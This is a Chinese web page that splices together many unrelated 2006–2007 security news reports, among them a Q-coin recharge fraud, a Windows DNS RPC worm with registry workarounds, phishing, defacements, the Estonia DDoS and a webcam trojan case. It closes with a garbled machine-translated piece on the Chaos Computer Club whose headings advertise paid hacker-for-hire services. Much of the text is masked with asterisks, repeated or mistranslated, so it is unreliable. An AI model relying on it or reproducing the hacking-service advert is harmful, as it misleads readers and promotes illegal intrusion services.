2006年3月24日这一天,丽水市电信公司的工作人员发现电信充值这一项业务继前一天暴涨之后又暴涨了,数据显示,电信充值业务量已高达16 万元,其中15.34万元属于Q币充值业务。这与平常每天5000元到1万元的业务量相比,反差实在太大了。之后,技术人员将全部Q币充值的话单拉出,发现那些充值的号码大部分根本没有具体的户名,怀疑是否有黑手躲在暗处操控着这项充值业务。
于是,该公司立刻向该市莲都区公安分局紧急报案。
公安机关介入侦查后,两个在“ *** ”网上以3.5折的价格大量兜售Q币的商家浮出水面。警方立刻与这两个商家取得联系,据这两个商家透露,这些Q币是他们向四川一名用户批发来的,价格为3折。
“Q币大盗”二人行
2005年11月的一天,陈某在向其公司老板胥某借钱时,提起自己有一个朋友在北京参加一个SP(服务提供商)会议后,了解到了一个技术手段,可以利用VIOP,通过虚设本机号码来盗打电信的充值平台进行Q币充值。
胥某表现出了极大的兴趣,认为这是一个很好的发财机会。因为胥某的信息公司本身就提供VOIP业务,于是胥某便决定使用其公司的便利条件进行该项技术的“实践”。
直至案发,胥某和陈某交代,他们获得的实际收益已经超过70万元,使用充值的 *** 号有上万个,盗打充值电信资费在200万元以上。据《法制日报》
一、事件分析:
近日, 微软新发布了一份关于DNS服务RPC接口的安全通报(935964),公告中提示DNS服务的RPC接口存在缓冲区溢出漏洞,攻击者通过这个漏洞可以编写相关攻击代码,从而获得本地系统权限。目前dswlab Avert 监测到已有相关0day公开流传,并有恶意攻击者利用此漏洞进行攻击。目前DNS服务RPC出现了多个漏洞,超级巡警团队发现DNS 0day早在一个月前就在地下流传。
微软官方声称在5月8日才能发出有关的全部补丁,在此期间已经出现多个蠕虫,利用DNS漏洞在 *** 传播,据相关统计目前DNS漏洞受害者数量美国之一,中国第二,超级巡警团队提醒广大网民、网管给予重视并预防相关蠕虫破坏。
该漏洞会影响Windows 2000 Server和Windows 2003的所有版本。
目前,已有多个蠕虫在 *** 上传播,蠕虫通过扫描TCP:1025端口,利用DNS漏洞攻击受影响的服务器,被侵入后受攻击服务器将从攻击服务器处下载并运行病毒副本,释放多个病毒文件并把病毒释放的含病毒文件路径加载到注册表启动项。此外,蠕虫还具有后门功能,会连接远程IRC服务器接收操控指令。此外,受"DNS蠕虫"攻击后的系统,会主动去攻击带有DNS漏洞的局域网内的机器,并从攻击服务器下载"DNS蠕虫"及其它病毒,使被攻击的机器沦为肉鸡。
DNS蠕虫攻击成功后,还会在网页中加入病毒链接,会进一步扩大病毒传播的范围。
二、解决方案:
1、及时升级杀毒软件特征库至最新,超级巡警目前可完全查杀该蠕虫多个变种。
2、在服务中将DNS Server服务关闭。
3、如果需要提供DNS服务,可以通过禁用DNS的RPC接口来阻止远程攻击:
在注册表中“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS\Parameters”下新建一个“双字节值”,命名为“RpcProtocol”并将“RpcProtocol”的值设置为“4”。重启DNS服务。
几年前,Valve公司依靠一款个人开发的游戏Mod《CS》,赚的盆满钵满,自然引起了许多玩家的不满。其之后推出的 *** 游戏升级和销售系统STEAM也成了许多黑客攻击的对象。
近日,专门的反STEAM论坛中一位名叫MaddoxX贴出了自己的成果,他绕过了Valve的安全系统,获得了大量STEAM内部数据的访问权限。其中包括:
Valve内部网页截图
一部分Valve网吧帐号数据
错误记录文件
用户信用卡数据
Valve公司财务数据
他将这些截图都放在了网页上。目前,Valve的网吧用户收到的威胁最为直接,因为他已经宣称可以自建虚假的网吧帐号,拥有这一帐号可以随意下载所有STEAM游戏。而由于用户信用卡信息已经泄露,这一部分的潜在危险也十分令人担忧。
MaddoxX公布的Valve网页内容,甚至包括公司帐户余额
近日,一个利用微软DNS零日漏洞进行攻击的蠕虫病毒DNS蠕虫(worm.VanBot.bx)在互联网上流行开来。该病毒可利用DNS漏洞攻击企业DNS服务器,进而可能有机会控制企业整个 *** ,不仅可能导致企业 *** 瘫痪,同时还有机会盗取企业内部的机密信息。
据金山毒霸反病毒工程师戴光剑介绍,DNS蠕虫是一个具备后门特征的恶性蠕虫病毒,与冲击波、震荡波的攻击 *** 如出一辙,由于目前微软仍未发布针对 DNS漏洞的补丁程序,所以危险性非常大。更值得注意的是,企业用户都会在主要的服务器架设DNS服务,这就更可能受到该蠕虫的袭击。
此外,受"DNS蠕虫"攻击后的系统,会主动去攻击带有DNS漏洞的局域网内的机器,并从 *** 中某个指定URL地址下载"DNS蠕虫"及其它病毒,使被攻击的机器沦为"肉鸡"。
同时,对于DNS服务的漏洞,微软暂无相应的补丁,用户可通过修改注册表来禁止DNS服务的RPC功能。在 HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesDNSParameters下创建一个名为 "RpcProtocol"的DWORD值,并设定数值为4,然后重启DNS服务即可生效。若非必要时,建议关闭DNS服务,并禁止445、1024、 1025端口端口的连接。
近年来,漏洞已经成为病毒传播的一个重要途径。从冲击波、震荡波到06年出现的魔鬼波以及前段时间的ANI漏洞病毒,利用漏洞传播的病毒频繁出现。目前虽然"DNS蠕虫"在国内还未大面积感染,但专家预测在微软发布补丁程序之前的一段时间内,该病毒将会非常活跃,所以广大用户需提早预防。
4月19日,江民反病毒中心检测到,目前有一新蠕虫病毒(Rinbot-DNS RPC)正在利用微软WindowsDNS服务器漏洞进行大规模传播,据统计数据显示,目前在中国针对此漏洞的攻击数量爆增,仅次于美国排行第二。
据江民反病毒专家介绍,微软WindowsDNS服务器漏洞是继上周三紧急发布6个漏洞补丁后发现的又一被黑客利用的严重漏洞,目前利用该漏洞的软件已经在互联网上广泛传播,黑客也开始在攻击中利用这种软件。该漏洞会影响Windows 2000 Server和Windows 2003 Server系统,黑客们将RPC(远端程序呼叫)封包传到受影响的系统,就可以成功入侵用户的电脑系统。而Windows 2000 Professional、Windows XP和Windows Vista均不受该漏洞的影响。
据悉,微软在关于该漏洞的声明中指出,目前补丁程序正在紧张的开发和测试中,具体发布补丁的时间还没有定,但争取不晚于5月8号。同时微软针对该问题已经发布了一个临时解决放案,在补丁发布前 *** 管理员可以先禁用DNS RPC功能,并及时升级杀毒软件等。
江民反病毒专家提醒广大用户无需恐慌,对于安装了Windows XP和Windows Vista系统的用户是不存在该漏洞的威胁的,而对于 *** 管理员则需要对该漏洞引起重视,同时对于安装了Windows 2000 Server和Windows 2003 Server系统的普通用户而言也需要采取相应的措施进行预防。
专家建议用户可以通过修改注册表来进行防范:
1、启动注册表编辑器
2、找到HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS\Parameters项
3、新建DWORD键值‘RpcProtocol',并设置数值为4
4、重新启动DNS Server服务
企业用户可以安装带有漏洞统一管理功能的 *** 版杀毒软件进行统一布防,最新发布的江民KV *** 版2007可以对 *** 各种安全威胁进行综合统一布防、统一处理,其全网系统漏洞管理功能可实现全网漏洞统一检查、系统补丁全网下载及全网自动分发,为企业用户打造一个无懈可击的安全 *** 。
日前,全球领先的 *** 安全、端到端安全解决方案提供商以及按需定制服务提供商----SurfControl(伦敦:SRF)之一个捕获了借助国内当前最热门的奥运会门票预定来骗钱的网站。 该网站实际上是一个钓鱼网站,利用广大国民对于奥运的热衷和期待来进行非法诈骗。钓鱼者 *** 了一个冒充奥运会官方票务网站的假网站通过冒充奥组委的名义广泛发布奥运会门票兜售信息,以骗取广大国民的钱款。该网站目前已被查封,但SurfControl提醒广大网民此类网站仍然存在再次出现的可能,请大家在进行在线交易时一定要谨慎行事,千万不要轻易汇款或者提交个人的财物信息,以免上当受骗。
奥运会官方票务网站 作为当前国内影响范围最广、受关注程度更高的网站,在线预售之一天即有60多万人在线注册准备进行预定,因此该类钓鱼活动潜在的破坏性和恶劣影响都令人忧心忡忡。SurfControl作为业界领先的 *** 安全解决方案提供商,在防钓鱼网站和防垃圾邮件方面更是一马当先,此次率先截获仿冒奥运会官方票务网站更加验证了其出色的拦截能力。与此同时,SurfControl还要提醒广大网民朋友在进行在线交易时切忌马虎大意,轻易提供私人的财物信息甚至不假思索就给他人汇款,中了钓鱼者的圈套而上当受骗,带来无法挽回的损失。
昨天下午3点20分左右,财政部官方网站(被发现无法登录。截至记者昨晚10点20分发稿,该网恢复正常。至于官网故障原因,财政部 *** 维护中心没有透露。
市民郭先生说,他打算登录财政部网站查看“证券交易印花税税率涨至3%。”的消息,但不知什么原因始终无法登录。
记者随后输入财政部网址查看,页面显示为“无法找到服务器”,原因是“您正在查找的页当前不可用。网站可能遇到支持问题,或者您需要调整您的浏览器设置”。之后,记者多次重新输入网址,仍旧无法正常登录。
随后,记者进入搜狐财经股市风云论坛,看到有网友发帖称《最新发现:财政部网站进不去了》,但该帖内容已被删除,网友的发帖时间也无从显示。
在网易、新浪等论坛,网友们相继发帖称,财政部网站登录不上去了。其中,网友gonggongee于下午4点14分35秒在新浪论坛上称,财政部的网站已经被黑了。
就官网为何出故障,记者下午4点左右致电财政部 *** 维护中心。该中心一名女工作人员称,技术人员正在重启服务器,至于重启服务器是因为网站遭受攻击还是其他原因,该工作人员未作回应。
下午4点40分左右,记者再次致电财政部 *** 维护中心,一名男工作人员说,技术人员正在加紧维修,他不清楚网站何时出现故障,也不知道何时能恢复以及故障原因。
晚6点,财政部 *** 维护中心回复称,网站可以登录了,但记者登录后发现仅能看到财政部网站的栏头,却打不开页面上的内容。
晚10点20分,记者发稿时,该网恢复正常,页面内容均可点击查看。
据 *** 专业人士分析,网站无法登录的原因有多种,主要包括网站自行服务器关闭或黑客攻击致页面丢失等。
5月31日消息,据一业界安全组织的监测数据显示,从三月份到四月份,网页URL钓鱼攻击事件增长了近三倍, *** 犯罪分子重新启用2006年底曾使用过的一种策略,试图绕过所有基于浏览器的反钓鱼过滤软件的功能。
据APWG(反钓鱼组织),一个由1600家公司和 *** 机构组成的业界联盟,日前表示,一个月中,单一网址的数量由三月份的20871增长到四月份的55643。“通过使用大量的RUL网址,它们试图突破反钓鱼过滤装置,可能出现许多 URL指向同一个钓鱼网站的情形,”APWG秘书长彼德·卡塞迪表示,“钓鱼攻击者并不会去注册比平常数量更多的域名,而仅仅是让下级域名去随机产生更多的URL网址。”
卡塞迪说:“由于单一的URL通常不会被过滤软件识别并进行记录”。无论微软的IE,还是Mozilla的火狐浏览器,都依赖钓鱼攻击网站黑名单,对用户进行提醒。但卡塞迪同时也表示,随着 *** 协议及系统的不断改进,类似的技术漏洞会逐渐被堵塞。
美国白宫网站被中国黑客给黑了?昨日下午,这一说法在网上传播。华南师范大学四名在校生称自己见证了全过程,前后共计5分钟。但至记者发稿时为止,记者并未见白宫官方网站有只言片语提及此事,有电脑方面专家称,如果伍同学所言属实,有可能被黑的只是链接了白宫官方网站的网页。
华师大中文系大三的伍同学说自己经常登录白宫网站看最近的新闻。昨日下午2点45 分,当他再次点开时,首页竟一改往日模样,上面充满了对美国总统和夫人及美国人民的攻击,直至下午2点50分,才恢复正常。伍同学的三名舍友也见证了此事。
从伍同学所提供的“白宫网站被黑”的截屏图像看,上面果然充满了谩骂之词,“We Chinese super hacker”(我们是中国超级黑客)等句子赫然在目。
然而,有计算机专家表示,白宫官方网站应该为而非伍同学查看的那个网页。
青海之一起“黑客”攻击 *** 网站案日前告破,犯罪嫌疑人李某29日凌晨落网。
西宁市公安局公共信息 *** 监察支队副支队长顾刚介绍,2007年1月31日上午,青海省 *** 委托青海省招商局主办的“青海省投资贸易洽谈会网站”受到黑客攻击,出现黄色图片及有害信息。当 日下午,网站再次受到攻击。西宁市公安局网监支队接到报案后,立即展开调查。
经过近4个月的调查,公安人员5月29日在陕西省将犯罪嫌疑人李某抓获,并带回西宁。据李某交代,2006年8月,刚刚走出大学校门的他受聘于西安直线科技有限公司,从事 *** 工程。不久,青海省招商局委托陕西博雅文化传媒有限公司建设“青海省投资贸易洽谈会网站”,博雅公司将网站建设转包给西安直线科技有限公司。网站建好后,直线公司迟迟收不到剩余工程建设款,多次向博雅公司催要,博雅公司则称青海省招商局未结清工程款,而事实上青海省招商局已经足额将工程款支付给了博雅公司。
2007年1月31日,因拖欠工程款之事,西安直线科技有限公司负责人田某授意李某、汪某等人对“青海省投资贸易洽谈会网站”实施恶意攻击,在网民中产生了恶劣影响,导致该网站关闭一个多月,造成巨大损失。
目前,警方正在全力追捕田某等其他4名犯罪嫌疑人。
互联星空网站附带“特洛伊木马”病毒,只要拨号上网,电脑就会染毒。《每日经济新闻》昨天从北方电信有限公司河北省电信分公司获悉,27日上午,河北电信ADSL宽带用户遭遇了一场几乎无法避免的电脑病毒袭击。不过上海电信目前尚未发布类似情况。
经河北电信相关人士证实,由于中国电信互联星空河北网站(welcome.he.vnet.cn)在27日上午至下午三点之间,均附带木马病毒,导致部分河北电信ADSL宽带用户的电脑“集体中毒”。至于具体的中毒类型,河北电信方面昨天表示尚未明确。
作为中国电信自主拨号软件“星空极速”硬性附带的宽带上网“首页”,互联星空网站为何会附带?上述河北电信人士表示,“网站被攻击是唯一的原因”。“中毒”网友则表示,互联星空“作为每次上网都要强制打开的页面”,服务器安全还做不到位,“被人 ‘挂马’”,是中国电信忽视用户利益的表现。据记者了解,截至发稿前,河北电信方面还未就此次互联星空“带毒”事件向受影响用户作出解释。
上海电信方面昨天则告诉记者,由于互联星空河北网站不会影响到上海的电信宽带用户,所以上海电信目前还未发布类似情况公告。
利用朋友提供的网上银行账号和密码,张云和高进伙同他人通过网上交易的方式,购买“风云”游戏点卡6080元。日前,两人被静安区检察院以盗窃罪依法提起公诉。
2005年夏季的一天,张云在家中用 *** 网上聊天时,他的一个朋友为炫耀自己的电脑技术,将内有一张上海某银行银行卡账号和密码的图片发到他的电脑上。
张试用了一下,果然进入了王先生的银行账户。张就把该账号和密码保存在电脑里。
今年1月2日上午,张和堂兄(另行处理)一起玩“风云” *** 游戏时,发现账户内余额所剩无几。张想到了王先生的银行账户和密码,结果发现仍然能够使用,且该账户内有2万余元。两人就决定用王先生的钱购买一些“风云”游戏卡。得知两人的计划后,张的同学高进也决定参与。
当天,3人来到附近的2家网吧,用假名重新申请了一个新游戏账号,将王先生账户内的钱成功划到交易平台购买“风云”游戏点卡,共计买了120多张游戏点卡,花费6080元。第二天,3人将点卡平分。王先生发现失窃后,于1月8日向警方报案,公安人员经过缜密侦查,很快将此案侦破。
检察官提醒
市民应注意保管好自己的银行卡号、密码、身份证号码等资料,避免在网吧等公共场所使用网上银行或随意丢弃银行回单。同时,不要登录不熟悉的网上银行,并输入自己的银行卡号和密码。此外,要在自己的计算机上安装防火墙和防病毒软件,并定期更新病毒库及检测病毒。
中新网莫斯科5月18日电 据俄新社报道,俄罗斯总统办公厅消息人士5月17日透露,5月3日俄罗斯总统官方网站曾遭到史无前例规模的黑客攻击,从攻击特征来看黑客可能来自爱沙尼亚。
克里姆林宫消息人士17日对新闻界说,由于俄总统网站采用多路数据备份系统和现代化信息防护系统 ,因此虽然遭到较大规模的黑客攻击,最终蒙受了一定的损失,但还是成功避免了对 *** 资源监督的失控,网站没有瘫痪。
俄总统办公厅消息人士强调,当今世界各国 *** 系统都或多或少遭受到类似黑客攻击,爱沙尼亚当局在指责自己遭到俄罗斯黑客攻击时必须极其准确,有真凭实据,俄当局与对爱发动的黑客攻击没有任何关系。遗憾的是,现在几乎所有国家的国家机构网站都曾遭到黑客攻击。
近日爱沙尼亚指责俄罗斯对其蓄意发起黑客攻击,声称所有攻击都发生在爱 *** 决定迁移首都塔林市中心“青铜战士”苏军纪念碑之后,总统、 *** 、外交部、国防部、各大银行和报社网站纷纷遭到来自俄罗斯的黑客攻击。
新华网黑龙江频道5月10日专电(记者 梁书斌)黑龙江省黑河市一居民在帮助邻居维修电脑时,暗中种下“木马”程序,通过远程控制 *** 其夫妻隐私。目前,此人已被派出所处以行政罚款500元。
5月8日,黑河市花园街居民孙某来到花园边防派出所报案,称被他人 *** 夫妻生活隐私。经调查,李某承认了自己的违法事实,并供认了作案过程。李某今年30岁,是黑河市花园街居民,熟悉电脑。孙某(女)与李某居住在同一住宅楼,两人平日熟识并经常在 *** 上聊天。
5月4日,孙某让李某帮忙维修电脑,李借维修之机暗中在孙的电脑上设置了远程操控的“木马”程序,将视频摄像头对准孙家的双人床,并说摄像头的位置不能移动,否则电脑会出故障。
此后的几天,李在家里通过摄像头窥视孙家的隐私,有两次孙移动了摄像头,李便告诉孙某,因摄像头位置移动,电脑无法正常工作,同时进行远程干扰。对电脑知识一无所知的孙信以为真,再也不敢移动摄像头的位置。
李通过摄像头拍摄了孙某夫妻生活的画面,存在电脑中。5月7日晚,李某给孙某发来两张图片,胁迫孙某与之 *** ,孙立即到公安机关报案。
5月11日消息,据国外媒体报道,赛门铁克本周四表示,黑客可利用Windows自动升级功能在用户计算机中植入恶意程序。
赛门铁克称,Windows自动升级模块中的文件传输组件“后台智能传输服务(BITS)”主要是用于传递微软补丁程序的,但黑客却可以利用它,在用户计算机中植入恶意代码,并且可以绕过防火墙。
赛门铁克安全研究院Elia Florio称:“BITS是一个很好的工具,可以自动下载Windows更新。但不幸的是,也给传递恶意代码提供了机会。”
据悉,微软率先在Windows XP系统中引入了BITS。日前已被集成到Windows Server 2003和Windows Vista系统中。
5月13日消息,据国外媒体报道,研究人员日前在下一代互联网协议IPv6中发现了一处安全漏洞,可能导致用户遭受拒绝服务攻击。
据悉,该漏洞存在于IPv6的type 0路由头(RH0)特征中。OpenBSD和Cisco IOS系统在处理某些IPv6 type 0路由头时均存在拒绝服务漏洞,如果向运行上述系统的设备发送了特定的IPv6报文就可能导致设备崩溃。
本周,业内专家已经向互联网工程任务小组(IETF)提交了两份草案,对解决该问题提出了两项措施,即删除RH0功能,或至少默认禁用该功能。
据悉,该漏洞最初是由研究人员Philippe Biondi和Arnaud Ebalard发现的。二人表示,RH0漏洞至少使IPv6设备遭受拒绝服务攻击的可能性增加80倍。
而Internet Systems Consortium总裁Paul Vixie称:“该漏洞使事情变得很糟糕,一个十几岁的少年只要通过一部300美元的Linux PC就可以发动攻击。”
5月18日消息,据国外媒体报道,由于思科路由器出现故障,导致本周日本数百万网民无法接入互联网。
本月15日,日本NTT旗下NTT East *** 公司大约有2000-4000台思科路由器出现故障,导致数百万日本网民失去互联网连接7个小时。
据悉,NTT East目前正处在 *** 升级阶段。该问题是在切换到备份路由时路由器改写路由表后发生的。
对此,思科发言人称:“思科目前正与NTT East调查该问题,以确定故障原因,避免将来再此出现这样的问题。”
DNA杂志籍印度全国软件和服务企业协会(Nasscom) 与孟买警方开展互联网安全周活动之时,回顾了历史上的十大黑客事件——即使是那些被认为固若金汤的系统在黑客攻击面前总显得不堪一击。
Kevin Mitnick,一位在世界范围内举重若轻的黑客。世界上最强大的科技和电信公司——诺基亚 (Nokia),富士通(Fujitsu),摩托罗拉(Motorola),和 Sun Microsystems等的电脑系统都曾被他光顾过。1995 年他被FBI逮捕,于2000年获得假释。他从来不把自己的这种入侵行为称为黑客行为,按照他的解释,应为“社会工程 (social engineering)”。
2002年11月
伦敦人Gary McKinnon于2002年11月间在英国被指控非法侵入美国军方90多个电脑系统。他现在正接受英国法院就“快速引渡”去美国一事的审理。下一次听证会即将在近日举行。
1995年
来 自俄罗斯的黑客Vladimir Levin 在互连网上上演了精彩的“偷天换日”。他是历史上之一个通过入侵银行电脑系统来获利的黑客。1995年,他 侵入美国花旗银行并盗走1000万。他于1995年在英国被国际刑警逮捕。之后,他把帐户里的钱转移至美国,芬兰,荷兰,德国,爱尔兰等地。
1990年
1983
当Kevin Poulsen还是一名学生的时候,他就曾成功入侵Arpanet(我们现在使用的Internet的前身)。Kevin Poulsen当时利用了Arpanet的一个漏洞,能够暂时控制美国地区的Arpanet。
1996
美国黑客Timothy Lloyd曾将一个六行的恶意软件放在了其雇主——Omega工程公司(美国航天航空局和美国海军更大的供货商)的 *** 上。整个逻辑炸弹删除了Omega公司所有负责生产的软件。此事件导致Omega公司损失1000万美金。
1988
年 仅23岁的Cornell大学学生Robert Morris在Internet上释放了世界上首个“蠕虫”程序。Robert Morris最初仅仅是 把他这个99行的程序放在互联网上进行试验,可结果却使得他的机子被感染并迅速在互联网上蔓延开。美国等地的接入互联网电脑都受到影响。 Robert Morris也因此在1990年被判入狱。
1999
Melissa病毒 是世界上首个具有全球破坏力的病毒。David Smith在编写此病毒的时候年仅30岁。Melissa病毒使世界上300多间公司的电脑系统崩溃。整个病毒造成的损失接近4亿美金。David Smith随后被判处5年徒刑。
2000
年仅15岁的MafiaBoy(由于年龄太小,因此没有公布其真实身份)在2000年2月6日到2月14日情人节期间成功侵入包括eBay,Amazon 和Yahoo在内的大型网站服务器,他成功阻止了服务器向用户提供服务。他于2000年被捕。
1993
4月末,爱沙尼亚当局迁移苏联红军纪念碑引发的外交风波虽然表面上趋于平静,但近几周以来 *** 上的交锋却暗流汹涌,一浪高过一浪。爱沙尼亚重要的 *** 、银行、媒体网站都遭遇空前的黑客攻击,甚至一度被迫关闭。《北大西洋公约》组织(NATO)暗示,这可能是之一起国家间的“ *** 战”,与俄罗斯当局有关。
三波 *** 攻击接踵而至
据英国《卫报》5月17日报道,自4月27日爱沙尼亚拆除苏军纪念碑以来,该国总统和议会的官方网站、 *** 各大部门网站、政党网站的访问量就突然激增,服务器由于过于拥挤而陷于瘫痪。全国6大新闻机构中有3家遭到攻击,此外还有两家全国更大的银行和多家从事通讯业务的公司网站纷纷中招。
据统计,黑客们发动了三轮进攻。之一轮是从4月27日开始,至5月3日达到 *** 。第二轮是在5月8日至9日期间,9日是俄罗斯卫国战争胜利纪念日,也是俄罗斯社会最重要的节日,普京总统在当天发表演讲严厉谴责了亵渎二战英雄纪念碑的行为。第三轮进攻则是本周开始的,预计将在18日的俄欧峰会召开期间达到空前的规模。
爱沙尼亚是欧洲 *** 化程度更高的国家之一,电子政务系统非常发达。不过正是由于 *** 化程度高,所以更容易遭受黑客攻击。为了安全起见,受到攻击的网站曾一度完全关闭,后来又恢复了国内用户的进入通道,但来自国外网址的用户仍持续受限。目前还不清楚具体造成了多少损失。
“火力点大多来自俄罗斯”
爱沙尼亚当局认为这次空前的“ *** 战”是一次典型的“分布式拒绝服务攻击” (DDoS)。爱沙尼亚的 *** 安全专家表示,根据网址来判断,虽然火力点分布在世界各地,但大部分来自俄罗斯,甚至有些来自俄 *** 机构,这在初期表现尤为显著。其中一名组织进攻的黑客高手甚至可能与俄罗斯安全机构有关联。
爱沙尼亚《邮政时报》的编辑科普利表示:“ *** 攻击来自俄罗斯,毫无疑问。这是政治性的。”该报网站受到攻击后,已经关闭了国外用户通道有一周时间了,截至16日晚仍未恢复。
爱沙尼亚国防部发言人麦迪斯说:“我们幸运地在这次 *** 战中幸存下来了,大家马上展开了反击,并找到了消灭黑客的办法。”据悉,一名19岁少年已经在首都塔林被捕,警方指控他参与了 *** 攻击。据统计,爱沙尼亚140万人口有1/4是俄罗斯移民。
俄称指控必须拿出证据
目前,爱沙尼亚总统、外交部长和国防部长已经把这一紧急事件通报了欧盟其它国家的领导人和 *** 部长以及北约组织。欧盟和北约计划就这一事件与俄罗斯当局进行磋商,但始终避免对俄方提出正面指责。
爱沙尼亚国防部长阿维克索奥表示,北约及其成员国还没有把这次攻击定性为一次明显的军事行动。这就意味着《北大西洋公约》第五条中关于集体防御的规定不会自动生效。
针对这次非同寻常的 *** 袭击,来自北约成员国和北约的“反 *** 恐怖”组织NCSA的专家在美国西雅图举行了专门会议,并派出精兵强将赶赴塔林,对黑客展开 *** 追踪并研究对策。北约布鲁塞尔总部的一名官员表示:“这是一次作战安全事件,性质非常严重,直接关系到北约的作战 *** 。”
《卫报》指出,如果俄罗斯当局被证实在幕后策划了这次黑客攻击,那将是之一起国家对国家的“ *** 战”。不过,芬兰 *** 专家米科表示,很难证明俄罗斯当局在这件事中负有责任,克里姆林宫如果真选择发动攻击,给爱沙尼亚造成的损失可能更加严重。
俄罗斯驻布鲁塞尔大使奇若夫表示:“假如有人暗示攻击来自俄罗斯或俄 *** ,这是一项非常严重的指控,必须拿出证据。”
据金山反病毒专家戴光剑介绍,“软件黑手”变种ap并非专门针对炒股软件。该病毒运行后,会从C:\Program Files目录开始,枚举用户计算机上的所有文件,并删除Program File一级目录下的所有文件;同时病毒还会枚举除C:\Program Files目录以外的所有目录,尝试用一图片替换枚举到的文件,并把文件的扩展名改为bmp,而且病毒在删除文件时会显示一张图片,要求用户等候,以迷惑用户。对此,金山毒霸全球反病毒中心已于之一时间更新了病毒库,建议用户可登录免费下载最新版金山毒霸2007。
来自国家计算机 *** 应急技术处理协调中心(CNCERT)的最新消息表明,2007年4月1日至30日,我国大陆地区被篡改网站的数量为6205个,较上月增加了1525个。我国香港被篡改网站数量为19个,较上月减少了70个,我国台湾被篡改网站数量为17个,较上月减少了175个。
其中代号为 “黑豆豆”和“黑侠”的攻击者对大陆网站进行了大量的篡改。
其中,2007年4月1日至30日,大陆地区.gov.cn网站被篡改的数量为258个,较上月减少了67个,约占大陆被篡改网站的4.16%。其中,4月19日被篡改数量最多,为31起。
本月大陆被篡改的.gov.cn网站所占比例较上月有所下降,但仍高于我国.cn域名下的 *** 网站所占的3.0%比例。2007年1月至4月,大陆.gov.cn网站被篡改数量共计达1134个。
任何人都可跨过密码验证直接上网修改
北京教育考试院已对漏洞加强监控
昨日是2007年高考网上填报志愿之一天。一名对计算机安全敏感的考生意外地发现,今年高考志愿填报网页存在安全漏洞,任何人可以跨过密码验证修改志愿信息。
对此,北京教育考试院表示,有关部门已从 *** 技术等方面加强了监控,以防止考生信息泄露和被非法篡改。
可随意改填报好的志愿
昨日是北京市高招网上填报志愿之一天。早晨8点钟,一名正在填报高考志愿的考生意外地发现,志愿填报网页竟然存在安全漏洞,任何人都可以跨过密码验证,直接进入志愿填报页面随意修改信息。
按照这位同学的提示,记者进入网址为“ 的页面后点击提交志愿信息,随即考生登录的页面出现在电脑上。记者随意输入一组考生号,都能成功地进入志愿填报页面,也可随意修改已经填报好的志愿信息。这名考生后怕地说:“如果有人恶作剧,在填报的最后一刻改掉别人的志愿,那么对方根本毫无察觉,这不是要害了很多学生吗?”这名对计算机安全比较敏感的学生说,他是在上午填完志愿后就想测试一下它的安全性,输入了错误的密码,并在地址栏修改下一页面的网址。没想到竟然成功了!
将监控防止非法篡改
北京教育考试院有关负责人表示,今年北京市高招之一次志愿填报工作按原定计划已于昨日8时正式开始,截至17时已有6956名考生提交了高招志愿信息。
“考生登录考试院网站进入填报系统页面后,按步骤进行填报,提交后的志愿信息即可加密保存在志愿填报系统的数据库中。”该负责人表示,“在填报时间截止之前,考生可对已提交的本人志愿信息进行查询和修改。网上志愿填报工作结束后,各报名单位还将根据工作安排,组织考生在志愿信息表上签字确认。”
针对考生发现的“的页面存在的漏洞,也为了确保考生填报志愿信息的安全性,昨日下午北京教育考试院已会同有关方面,从 *** 技术、业务管理流程、人员操作等多方面加强了对志愿填报系统的监控,防止考生信息泄露和被非法篡改。
黑客在线交易中心,专业黑 *** 务后付款。说到黑客,大多数人的之一印象可能是他们难以捉摸,神秘,不擅长语言。他们也不喜欢参加聚会和户外活动。他们经常穿着黑色衣服躲在电脑屏幕后面,以爆炸般的速度破解键盘上的各种密码,这让被攻击的人坐立不安。说到黑客,大多数人的之一印象可能是他们难以捉摸,神秘,不擅长语言。他们也不喜欢参加聚会和户外活动。他们经常穿着黑色衣服躲在电脑屏幕后面,以爆炸般的速度破解键盘上的各种密码,这让被攻击的人坐立不安。
真的是这样吗?今年元旦,一个接管了一万人身体的黑客组织让公众对黑客有了新的认识。
来自德国的黑客组织混沌计算机俱乐部( 黑客高手 )举办了一个新年活动“35C3”。所有门票都卖完了,吸引了16,000多名参与者,包括许多儿童。
迄今为止更大规模的黑客 *** 立即将这个风景如画的组织公之于众。
新年不仅看起来像一场音乐会,而且为了庆祝它的20岁生日,黑客高手还在柏林的Haus des Lehrers大楼举办了一场大型灯光表演...
当这些黑客如此“肆无忌惮”时,为什么他们没有被列入“射击名单”?
黑客在线交易中心
为所有人付费:
矩阵中的正义?
混乱俱乐部开始在世界上出名,从一次黑客事件开始,引起了全德国对安全漏洞的关注。
Bildschirmtext是德国邮政于1983年推出的在线交互式图文系统。内容提供商根据接受的页面设定价格,接收者付费。作为公众更大的商业在线系统,德国电信向公众宣称其系统非常安全,但很快被黑客高手击败。
黑客高手黑客突破了系统的安全漏洞,让它在汉堡银行支付134,000林吉特给自己。当然,这些钱第二天在媒体上被公开返还。
黑客高手还击败了苹果和三星。
2013年,人们广泛讨论了苹果iPhone 5s和iOS 7支持的触摸ID指纹识别传感器的安全系统。黑客高手黑客Starbug通过日常用品成功地从玻璃表面复制了一组指纹,并成功地愚弄了触摸ID系统来解锁iPhone5S。
三星Galaxy S8的虹膜识别系统也声称是“锁定手机和隐私的最安全方式之一”,因为“虹膜上的图案是独一无二的,几乎不可能复制”。很快,三星哑口无言。
黑客高手只用了一个小DC,激光打印机和隐形眼镜就可以轻松解锁设备。
专业黑 *** 务后付款
不要惊讶于商业组织的安全意识如此脆弱,因为在黑客高手看来, *** 的级别不够高。
2008年3月,黑客高手获得了德国内政部长沃尔夫冈·朔伊布勒的指纹,并在杂志上发表。这也意味着杂志的读者可以轻易地 *** 指纹来愚弄指纹阅读器。
据说这样做是为了 *** 德国在电子护照等身份识别设备中使用生物识别数据。
用来 *** 黑客接单平台的吉祥物被用来 *** 黑客接单平台的吉祥物。
总而言之,黑客高手在 *** 企业和 *** 安全漏洞的反腐败事件方面没有做得更少。
然而,很明显,这群黑客并不打算获取不当利润。在他们突破漏洞后,他们通常会回报他们的利益。这只是在媒体和公众面前的一次大宣传。
这有点像江湖侠客,擅长武侠小说中的正义。他半夜去官员和绅士的家里偷了一些东西,第二天就挂在公告栏上: XXX家庭非常不可靠,所以每个人都应该注意零食的预防...
我相信大多数普通人会拍手鼓掌,让那些被公开惩罚的人蒙着一张茫然的脸,在风中流泪。
一群理想主义的“小偷”,
它是如何工作的?
